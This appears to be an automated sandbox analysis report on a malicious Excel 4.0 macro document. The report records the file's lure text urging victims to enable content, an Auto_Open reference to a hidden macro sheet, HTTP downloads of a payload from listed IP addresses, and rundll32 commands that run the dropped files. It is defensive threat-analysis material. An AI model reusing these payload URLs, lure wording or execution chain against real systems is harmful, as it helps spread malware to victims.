Analysis Report Comission_1980420924_03172021.xlsm

Overview

General Information

Sample Name:	Comission_1980420924_03172021.xlsm
Analysis ID:	383366
MD5:	7c87c28b3c650992cca31f7728aa2cfd
SHA1:	e278ae31532f3f65297d8c97d21080321cd79e9f
SHA256:	c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Outdated Microsoft Office dropper detected

Excel documents contains an embedded macro which executes code when the document is opened

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses a known web browser user agent for HTTP communication

Classification

Signatures

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: 44293.7276049768.dat

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 188.119.112.114:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 188.127.230.104:80

Networking:

Outdated Microsoft Office dropper detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	DNS query: 44293.7276049768.dat is down
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	DNS query: 44293.7276049768.dat is down

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.119.112.114 188.119.112.114
Source: Joe Sandbox View	IP Address: 188.127.230.104 188.127.230.104

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: 44293.7276049768.dat replaycode: Name error (3)

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.119.112.114Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.75Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown	TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown	TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown	TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown	TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown	TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown	TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown	TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown	TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown	TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown	TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown	TCP traffic detected without corresponding DNS query: 188.119.112.114

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4B9C4AC.jpeg

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.119.112.114Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.75Connection: Keep-Alive

Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: 44293.7276049768.dat

Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl
Source: Screenshot number: 4	Screenshot OCR: Enable Content bytton from the yellow bar above R jnMl Rr ;r'j i m m RunDLL \|~\| ,0 There was a
Source: Screenshot number: 8	Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 8	Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Source: Document image extraction number: 1	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable
Source: Document image extraction number: 1	Screenshot OCR: Enable Content bytton from the yellow bar above
Source: Screenshot number: 12	Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 12	Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25

Found Excel 4.0 Macro with suspicious formulas

Source: Comission_1980420924_03172021.xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: Comission_1980420924_03172021.xlsm

Initial sample: Sheet size: 19220

Excel documents contains an embedded macro which executes code when the document is opened

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook>

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal68.troj.expl.evad.winXLSM@7/7@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDD05.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Comission_1980420924_03172021.xlsm	Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Comission_1980420924_03172021.xlsm	Initial sample: OLE zip file path = xl/drawings/drawing3.xml
Source: Comission_1980420924_03172021.xlsm	Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Comission_1980420924_03172021.xlsm	Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
Source: Comission_1980420924_03172021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.119.112.114	unknown	Russian Federation	50673	SERVERIUS-ASNL	false
188.127.230.104	unknown	Russian Federation	56694	DHUBRU	false
185.82.219.75	unknown	Bulgaria	59729	ITL-BG	false

Contacted Domains

Name	IP	Active
44293.7276049768.dat	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://188.119.112.114/44293.7276049768.dat	false	Avira URL Cloud: safe	unknown
http://185.82.219.75/44293.7276049768.dat	false	Avira URL Cloud: safe	unknown

ID:	383366
Product:	CloudBasic
Start time:	17:26:50
Start date:	07.04.2021
Sample:	Comission_1980420924_03172021.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	7c87c28b3c650992cca31f7728aa2cfd
SHA1:	e278ae31532f3f65297d8c97d21080321cd79e9f
SHA256:	c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
Filetype:	Excel Microsoft Office Open XML Format document (40004/1) 83.33%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4B9C4AC.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1386x1386, frames 3	1BE35F6C74B488050049162605294C82	6788B12BD406903C82C3ED6FD46DD8E833612A74	788C88EB21A724887B5258A8170157BD11FE6A78E0C2C71326E194B6BDF12AC9
C:\Users\user\AppData\Local\Temp\F7EE0000	data	3183FB5D6421CC1F110EA846C2C4FE02	73F72B131BEB08FDCEED26712608A5BB6D702F39	5EF1C8E82EB7AABCFED7F5C1B4DF87773031C55AE1D20AE8EA5E9B0E76908689
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Comission_1980420924_03172021.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Apr 7 23:27:44 2021, atime=Wed Apr 7 23:27:44 2021, length=188507, window=hide	283403B64400B152CB39FE9631EAE5FA	1506F69FBA1E7C39E1753278B945FCA86B17F918	06209C94AF63A42B29BB21A88DF5F4794574FDA4DA44BDC5840BFF6E61337D62
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 23:27:44 2021, atime=Wed Apr 7 23:27:44 2021, length=12288, window=hide	D4652003C954E3E9E2EDA84FED50A8BD	FBB4FC9DB4E4F9489E482EE5143C8C9C081124EE	62A82F438F91CA496440A4CF14E635455105101087FBC4F8B60A36399BF80A9B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	5689775EF36F265CCF27A9BAF089052B	81F675CAA034CB470D0815A91D6AD59E25EF83E8	FE8FD49E33FDBC456FA7C1D19603A9652BFF3839E92EB7C096428A87628A1562
C:\Users\user\Desktop\C8EE0000	data	3183FB5D6421CC1F110EA846C2C4FE02	73F72B131BEB08FDCEED26712608A5BB6D702F39	5EF1C8E82EB7AABCFED7F5C1B4DF87773031C55AE1D20AE8EA5E9B0E76908689
C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsm	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523

Analysis Report Comission_1980420924_03172021.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs